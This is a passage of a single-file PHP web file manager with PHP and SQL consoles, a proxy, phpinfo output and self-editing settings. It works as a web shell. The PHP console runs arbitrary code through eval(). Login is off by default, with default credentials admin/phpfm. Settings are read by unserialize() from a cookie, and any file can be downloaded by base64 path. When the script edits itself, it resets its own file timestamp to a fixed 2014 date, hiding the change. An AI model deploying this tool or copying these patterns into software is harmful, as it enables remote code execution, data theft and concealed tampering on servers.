file?","Archiving":"Archiving","Authorization":"Authorization","Back":"Back","Cancel":"Cancel","Chinese":"Chinese","Compress":"Compress","Console":"Console","Cookie":"Cookie","Created":"Created","Date":"Date","Days":"Days","Decompress":"Decompress","Delete":"Delete","Deleted":"Deleted","Download":"Download","done":"done","Edit":"Edit","Enter":"Enter","English":"English","Error occurred":"Error occurred","File manager":"File manager","File selected":"File selected","File updated":"File updated","Filename":"Filename","Files uploaded":"Files uploaded","French":"French","Generation time":"Generation time","German":"German","Home":"Home","Quit":"Quit","Language":"Language","Login":"Login","Manage":"Manage","Make directory":"Make directory","Name":"Name","New":"New","New file":"New file","no files":"no files","Password":"Password","pictures":"pictures","Recursively":"Recursively","Rename":"Rename","Reset":"Reset","Reset settings":"Reset settings","Restore file time after editing":"Restore file time after editing","Result":"Result","Rights":"Rights","Russian":"Russian","Save":"Save","Select":"Select","Select the file":"Select the file","Settings":"Settings","Show":"Show","Show size of the folder":"Show size of the folder","Size":"Size","Spanish":"Spanish","Submit":"Submit","Task":"Task","templates":"templates","Ukrainian":"Ukrainian","Upload":"Upload","Value":"Value","Hello":"Hello","Found in files":"Found in files","Search":"Search","Recursive search":"Recursive search","Mask":"Mask"}'; // end configuration // Preparations $starttime = explode(' ', microtime()); $starttime = $starttime[1] + $starttime[0]; $langs = array('en','ru','de','fr','uk'); $path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']); $path = str_replace('\\', '/', $path) . '/'; $main_path=str_replace('\\', '/',realpath('./')); $phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false; $msg = ''; // service string $default_language = 'ru'; $detect_lang = true; $fm_version = 1.4; //Authorization $auth = json_decode($authorization,true); $auth['authorize'] = isset($auth['authorize']) ? $auth['authorize'] : 0; $auth['days_authorization'] = (isset($auth['days_authorization'])&&is_numeric($auth['days_authorization'])) ? (int)$auth['days_authorization'] : 30; $auth['login'] = isset($auth['login']) ? $auth['login'] : 'admin'; $auth['password'] = isset($auth['password']) ? $auth['password'] : 'phpfm'; $auth['cookie_name'] = isset($auth['cookie_name']) ? $auth['cookie_name'] : 'fm_user'; $auth['script'] = isset($auth['script']) ? $auth['script'] : ''; // Little default config $fm_default_config = array ( 'make_directory' => true, 'new_file' => true, 'upload_file' => true, 'show_dir_size' => false, //if true, show directory size → maybe slow 'show_img' => true, 'show_php_ver' => true, 'show_php_ini' => false, // show path to current php.ini 'show_gt' => true, // show generation time 'enable_php_console' => true, 'enable_sql_console' => true, 'sql_server' => 'localhost', 'sql_username' => 'root', 'sql_password' => '', 'sql_db' => 'test_base', 'enable_proxy' => true, 'show_phpinfo' => true, 'show_xls' => true, 'fm_settings' => true, 'restore_time' => true, 'fm_restore_time' => false, ); if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config; else $fm_config = unserialize($_COOKIE['fm_config']); // Change language if (isset($_POST['fm_lang'])) { setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_lang'] = $_POST['fm_lang']; } $language = $default_language; // Detect browser language if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){ $lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']); if (!empty($lang_priority)){ foreach ($lang_priority as $lang_arr){ $lng = explode(';', $lang_arr); $lng = $lng[0]; if(in_array($lng,$langs)){ $language = $lng; break; } } } } // Cookie language is primary for ever $language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang']; // Localization $lang = json_decode($translation,true); if ($lang['id']!=$language) { $get_lang = file_get_contents('https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/' . $language . '.json'); if (!empty($get_lang)) { //remove unnecessary characters $translation_string = str_replace("'",''',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE)); $fgc = file_get_contents(__FILE__); $search = preg_match('#translation[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$translation_string,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } $lang = json_decode($translation_string,true); } } /* Functions */ //translation function __($text){ global $lang; if (isset($lang[$text])) return $lang[$text]; else return $text; }; //delete files and dirs recursively function fm_del_files($file, $recursive = false) { if($recursive && @is_dir($file)) { $els = fm_scan_dir($file, '', '', true); foreach ($els as $el) { if($el != '.' && $el != '..'){ fm_del_files($file . '/' . $el, true); } } } if(@is_dir($file)) { return rmdir($file); } else { return @unlink($file); } } //file perms function fm_rights_string($file, $if = false){ $perms = fileperms($file); $info = ''; if(!$if){ if (($perms & 0xC000) == 0xC000) { //Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { //Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { //Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { //Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { //Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { //Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { //FIFO pipe $info = 'p'; } else { //Unknown $info = 'u'; } } //Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); //Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); //World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function fm_convert_rights($mode) { $mode = str_pad($mode,9,'-'); $trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1'); $mode = strtr($mode,$trans); $newmode = '0'; $owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; $group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; $world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; $newmode .= $owner . $group . $world; return intval($newmode, 8); } function fm_chmod($file, $val, $rec = false) { $res = @chmod(realpath($file), $val); if(@is_dir($file) && $rec){ $els = fm_scan_dir($file); foreach ($els as $el) { $res = $res && fm_chmod($file . '/' . $el, $val, true); } } return $res; } //load files function fm_download($file_name) { if (!empty($file_name)) { if (file_exists($file_name)) { header("Content-Disposition: attachment; filename=" . basename($file_name)); header("Content-Type: application/force-download"); header("Content-Type: application/octet-stream"); header("Content-Type: application/download"); header("Content-Description: File Transfer"); header("Content-Length: " . filesize($file_name)); flush(); // this doesn't really matter. $fp = fopen($file_name, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); // this is essential for large downloads } fclose($fp); die(); } else { header('HTTP/1.0 404 Not Found', true, 404); header('Status: 404 Not Found'); die(); } } } //show folder size function fm_dir_size($f,$format=true) { if($format) { $size=fm_dir_size($f,false); if($size<=1024) return $size.' bytes'; elseif($size<=1024*1024) return round($size/(1024),2).' Kb'; elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).' Mb'; elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).' Gb'; elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).' Tb'; //:))) else return round($size/(1024*1024*1024*1024*1024),2).' Pb'; // ;-) } else { if(is_file($f)) return filesize($f); $size=0; $dh=opendir($f); while(($file=readdir($dh))!==false) { if($file=='.' || $file=='..') continue; if(is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file); else $size+=fm_dir_size($f.'/'.$file,false); } closedir($dh); return $size+filesize($f); } } //scan directory function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) { $dir = $ndir = array(); if(!empty($exp)){ $exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/'; } if(!empty($type) && $type !== 'all'){ $func = 'is_' . $type; } if(@is_dir($directory)){ $fh = opendir($directory); while (false !== ($filename = readdir($fh))) { if(substr($filename, 0, 1) != '.' || $do_not_filter) { if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){ $dir[] = $filename; } } } closedir($fh); natsort($dir); } return $dir; } function fm_link($get,$link,$name,$title='') { if (empty($title)) $title=$name.' '.basename($link); return ' <a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>'; } function fm_arr_to_option($arr,$n,$sel=''){ foreach($arr as $v){ $b=$v[$n]; $res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>'; } return $res; } function fm_lang_form ($current='en'){ return ' <form name="change_lang" method="post" action=""> <select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" > <option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option> <option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option> <option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option> <option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option> <option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option> </select> </form> '; } function fm_root($dirname){ return ($dirname=='.' OR $dirname=='..'); } function fm_php($string){ $display_errors=ini_get('display_errors'); ini_set('display_errors', '1'); ob_start(); eval(trim($string)); $text = ob_get_contents(); ob_end_clean(); ini_set('display_errors', $display_errors); return $text; } //SHOW DATABASES function fm_sql_connect(){ global $fm_config; return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']); } function fm_sql($query){ global $fm_config; $query=trim($query); ob_start(); $connection = fm_sql_connect(); if ($connection->connect_error) { ob_end_clean(); return $connection->connect_error; } $connection->set_charset('utf8'); $queried = mysqli_query($connection,$query); if ($queried===false) { ob_end_clean(); return mysqli_error($connection); } else { if(!empty($queried)){ while($row = mysqli_fetch_assoc($queried)) { $query_result[]= $row; } } $vdump=empty($query_result)?'':var_export($query_result,true); ob_end_clean(); $connection->close(); return '<pre>'.stripslashes($vdump).'</pre>'; } } function fm_backup_tables($tables = '*', $full_backup = true) { global $path; $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; if($tables == '*') { $tables = array(); $result = $mysqldb->query('SHOW TABLES'); while($row = mysqli_fetch_row($result)) { $tables[] = $row[0]; } } else { $tables = is_array($tables) ? $tables : explode(',',$tables); } $return=''; foreach($tables as $table) { $result = $mysqldb->query('SELECT * FROM '.$table); $num_fields = mysqli_num_fields($result); $return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter; $row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table)); $return.=$row2[1].$delimiter; if ($full_backup) { for ($i = 0; $i < $num_fields; $i++) { while($row = mysqli_fetch_row($result)) { $return.= 'INSERT INTO `'.$table.'` VALUES('; for($j=0; $j<$num_fields; $j++) { $row[$j] = addslashes($row[$j]); $row[$j] = str_replace("\n","\\n",$row[$j]); if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; } if ($j<($num_fields-1)) { $return.= ','; } } $return.= ')'.$delimiter; } } } else { $return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return); } $return.="\n\n\n"; } //save file $file=gmdate("Y-m-d_H-i-s",time()).'.sql'; $handle = fopen($file,'w+'); fwrite($handle,$return); fclose($handle); $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path . '\'"'; return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; } function fm_restore_tables($sqlFileToExecute) { $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; // Load and explode the sql file $f = fopen($sqlFileToExecute,"r+"); $sqlFile = fread($f,filesize($sqlFileToExecute)); $sqlArray = explode($delimiter,$sqlFile); //Process the sql file by statements foreach ($sqlArray as $stmt) { if (strlen($stmt)>3){ $result = $mysqldb->query($stmt); if (!$result){ $sqlErrorCode = mysqli_errno($mysqldb->connection); $sqlErrorText = mysqli_error($mysqldb->connection); $sqlStmt = $stmt; break; } } } if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute; else return $sqlErrorText.'<br/>'.$stmt; } function fm_img_link($filename){ return './'.basename(__FILE__).'?img='.base64_encode($filename); } function fm_home_style(){ return ' input, input.fm_input { text-indent: 2px; } input, textarea, select, input.fm_input { color: black; font: normal 8pt Verdana, Arial, Helvetica, sans-serif; border-color: black; background-color: #FCFCFC none !important; border-radius: 0; padding: 2px; } input.fm_input { background: #FCFCFC none !important; cursor: pointer; } .home { background-image: url(""); background-repeat: no-repeat; }'; } function fm_config_checkbox_row($name,$value) { global $fm_config; return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>'; } function fm_protocol() { if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://'; if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://'; if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://'; if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://'; return 'http://'; } function fm_site_url() { return fm_protocol().$_SERVER['HTTP_HOST']; } function fm_url($full=false) { $host=$full?fm_site_url():'.'; return $host.'/'.basename(__FILE__); } function fm_home($full=false){ return ' <a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home"> </span></a>'; } function fm_run_input($lng) { global $fm_config; $return = !empty($fm_config['enable_'.$lng.'_console']) ? ' <form method="post" action="'.fm_url().'" style="display:inline"> <input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'"> </form> ' : ''; return $return; } function fm_url_proxy($matches) { $link = str_replace('&','&',$matches[2]); $url = isset($_GET['url'])?$_GET['url']:''; $parse_url = parse_url($url); $host = $parse_url['scheme'].'://'.$parse_url['host'].'/'; if (substr($link,0,2)=='//') { $link = substr_replace($link,fm_protocol(),0,2); } elseif (substr($link,0,1)=='/') { $link = substr_replace($link,$host,0,1); } elseif (substr($link,0,2)=='./') { $link = substr_replace($link,$host,0,2); } elseif (substr($link,0,4)=='http') { //alles machen wunderschon } else { $link = $host.$link; } if ($matches[1]=='href' && !strripos($link, 'css')) { $base = fm_site_url().'/'.basename(__FILE__); $baseq = $base.'?proxy=true&url='; $link = $baseq.urlencode($link); } elseif (strripos($link, 'css')){ //как-то тоже подменять надо } return $matches[1].'="'.$link.'"'; } function fm_tpl_form($lng_tpl) { global ${$lng_tpl.'_templates'}; $tpl_arr = json_decode(${$lng_tpl.'_templates'},true); $str = ''; foreach ($tpl_arr as $ktpl=>$vtpl) { $str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]" cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>'; } return ' <table> <tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr> '.$str.' <tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr> </form> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value" cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr> </form> </table> '; } /* End Functions */ // authorization if ($auth['authorize']) { if (isset($_POST['login']) && isset($_POST['password'])){ if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) { setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization'])); $_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']); } } if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) { echo ' <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>'.__('File manager').'</title> </head> <body> <form action="" method="post"> '.__('Login').' <input name="login" type="text"> '.__('Password').' <input name="password" type="password"> <input type="submit" value="'.__('Enter').'" class="fm_input"> </form> '.fm_lang_form($language).' </body> </html> '; die(); } if (isset($_POST['quit'])) { unset($_COOKIE[$auth['cookie_name']]); setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']); } } // Change config if (isset($_GET['fm_settings'])) { if (isset($_GET['fm_config_delete'])) { unset($_COOKIE['fm_config']); setcookie('fm_config', '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_url().'?fm_settings=true'); exit(0); } elseif (isset($_POST['fm_config'])) { $fm_config = $_POST['fm_config']; setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_config'] = serialize($fm_config); $msg = __('Settings').' '.__('done'); } elseif (isset($_POST['fm_login'])) { if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login']; $fm_login = json_encode($_POST['fm_login']); $fgc = file_get_contents(__FILE__); $search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); if ($_POST['fm_login']['login'] != $auth['login']) $msg .= ' '.__('Login').': '.$_POST['fm_login']['login']; if ($_POST['fm_login']['password'] != $auth['password']) $msg .= ' '.__('Password').': '.$_POST['fm_login']['password']; $auth = $_POST['fm_login']; } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } elseif (isset($_POST['tpl_edited'])) { $lng_tpl = $_POST['tpl_edited']; if (!empty($_POST[$lng_tpl.'_name'])) { $fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS); } elseif (!empty($_POST[$lng_tpl.'_new_name'])) { $fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS); } if (!empty($fm_php)) { $fgc = file_get_contents(__FILE__); $search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc); if (file_put_contents(__FILE__, $replace)) { ${$lng_tpl.'_templates'} = $fm_php; $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } else $msg .= __('Error occurred'); } } // Just show image if (isset($_GET['img'])) { $file=base64_decode($_GET['img']); if ($info=getimagesize($file)){ switch ($info[2]){ //1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP case 1: $ext='gif'; break; case 2: $ext='jpeg'; break; case 3: $ext='png'; break; case 6: $ext='bmp'; break; default: die(); } header("Content-type: image/$ext"); echo file_get_contents($file); die(); } } // Just download file if (isset($_GET['download'])) { $file=base64_decode($_GET['download']); fm_download($file); } // Just show info if (isset($_GET['phpinfo'])) { phpinfo(); die(); } // Mini proxy, many bugs! if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) { $url = isset($_GET['url'])?urldecode($_GET['url']):''; $proxy_form = ' <div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);"> <form action="" method="GET"> <input type="hidden" name="proxy" value="true"> '.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55"> <input type="submit" value="'.__('Show').'" class="fm_input"> </form> </div> '; if ($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy'); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_REFERER, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); $result = curl_exec($ch); curl_close($ch); //$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result); $result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result); $result = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result); echo $result; die(); } } ?> <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title><?=__('File manager')?></title> <style> body { background-color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; margin: 0px; } a:link, a:active, a:visited { color: #006699; text-decoration: none; } a:hover { color: #DD6900; text-decoration: underline; } a.th:link { color: #FFA34F; text-decoration: none; } a.th:active { color: #FFA34F; text-decoration: none; } a.th:visited { color: #FFA34F; text-decoration: none; } a.th:hover { color: #FFA34F; text-decoration: underline; } table.bg { background-color: #ACBBC6 } th, td { font: normal 8pt Verdana, Arial, Helvetica, sans-serif; padding: 3px; } th { height: 25px; background-color: #006699; color: #FFA34F; font-weight: bold; font-size: 11px; } .row1 { background-color: #EFEFEF; } .row2 { background-color: #DEE3E7; } .row3 { background-color: #D1D7DC; padding: 5px; } tr.row1:hover { background-color: #F3FCFC; } tr.row2:hover { background-color: #F0F6F6; } .whole { width: 100%; } .all tbody td:first-child{width:100%;} textarea { font: 9pt 'Courier New', courier; line-height: 125%; padding: 5px; } .textarea_input { height: 1em; } .textarea_input:focus { height: auto; } input[type=submit]{ background: #FCFCFC none !important; cursor: pointer; } .folder { background-image: url(""); } .file { background-image: url(""); } <?=fm_home_style()?> .img { background-image: url(""); } @media screen and (max-width:720px){ table{display:block;} #fm_table td{display:inline;float:left;} #fm_table tbody td:first-child{width:100%;padding:0;} #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;} #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;} #fm_table tr{display:block;float:left;clear:left;width:100%;} #header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;} #header_table table td {display:inline;float:left;} } </style> </head> <body> <?php $url_inc = '?fm=true'; if (isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){ $res = empty($_POST['sql']) ? '' : $_POST['sql']; $res_lng = 'sql'; } elseif (isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){ $res = empty($_POST['php']) ? '' : $_POST['php']; $res_lng = 'php'; } if (isset($_GET['fm_settings'])) { echo ' <table class="whole"> <form method="post" action=""> <tr><th colspan="2">'.__('File manager').' - '.__('Settings').'</th></tr> '.(empty($msg)?'':'<tr><td class="row2" colspan="2">'.$msg.'</td></tr>').' '.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').' '.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').' '.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').' '.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').' '.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').' '.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').' '.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').' '.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').' '.fm_config_checkbox_row(__('Show').' xls','show_xls').' '.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').' '.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').' <tr><td class="row1"><input name="fm_config[sql_server]" value="'.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr> <tr><td class="row1"><input name="fm_config[sql_username]" value="'.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr> <tr><td class="row1"><input name="fm_config[sql_password]" value="'.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr> <tr><td class="row1"><input name="fm_config[sql_db]" value="'.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr> '.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').' '.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').' '.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').' '.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').' '.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').' <tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr> </form> </table> <table> <form method="post" action=""> <tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr> <tr><td class="row1"><input name="fm_login[authorize]" value="1" '.($auth['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr> <tr><td class="row1"><input name="fm_login[login]" value="'.$auth['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr> <tr><td class="row1"><input name="fm_login[password]" value="'.$auth['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr> <tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr> <tr><td class="row1"><input name="fm_login[days_authorization]" value="'.$auth['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr> <tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'.$auth['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr> </form> </table>'; echo fm_tpl_form('php'),fm_tpl_form('sql'); } elseif (isset($proxy_form)) { die($proxy_form); } elseif (isset($res_lng)) { ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php if($res_lng=='sql') echo ' - Database: '.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php'); else echo '</h2></td><td>'.fm_run_input('sql'); ?></td></tr></table></td> </tr> <tr> <td class="row1"> <a href="<?=$url_inc.'&path=' . $path;?>"><?=__('Back')?></a> <form action="" method="POST" name="console"> <textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/> <input type="reset" value="<?=__('Reset')?>"> <input type="submit" value="<?=__('Submit')?>" name="<?=$res_lng?>run"> <?php $str_tmpl = $res_lng.'_templates'; $tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : ''; if (!empty($tmpl)){ $active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : ''; $select = '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n"; $select .= '<option value="-1">' . __('Select') . "</option>\n"; foreach ($tmpl as $key=>$value){ $select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n"; } $select .= "</select>\n"; echo $select; } ?> </form> </td> </tr> </table> <?php if (!empty($res)) { $fun='fm_'.$res_lng; echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>'; } } elseif (!empty($_REQUEST['edit'])){ if(!empty($_REQUEST['save'])) { $fn = $path . $_REQUEST['edit']; $filemtime = filemtime($fn); if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg .= __('File updated'); else $msg .= __('Error occurred'); if ($_GET['edit']==basename(__FILE__)) { touch(__FILE__,1415116371); } else { if (!empty($fm_config['restore_time'])) touch($fn,$filemtime); } } $oldcontent = @file_get_contents($path . $_REQUEST['edit']); 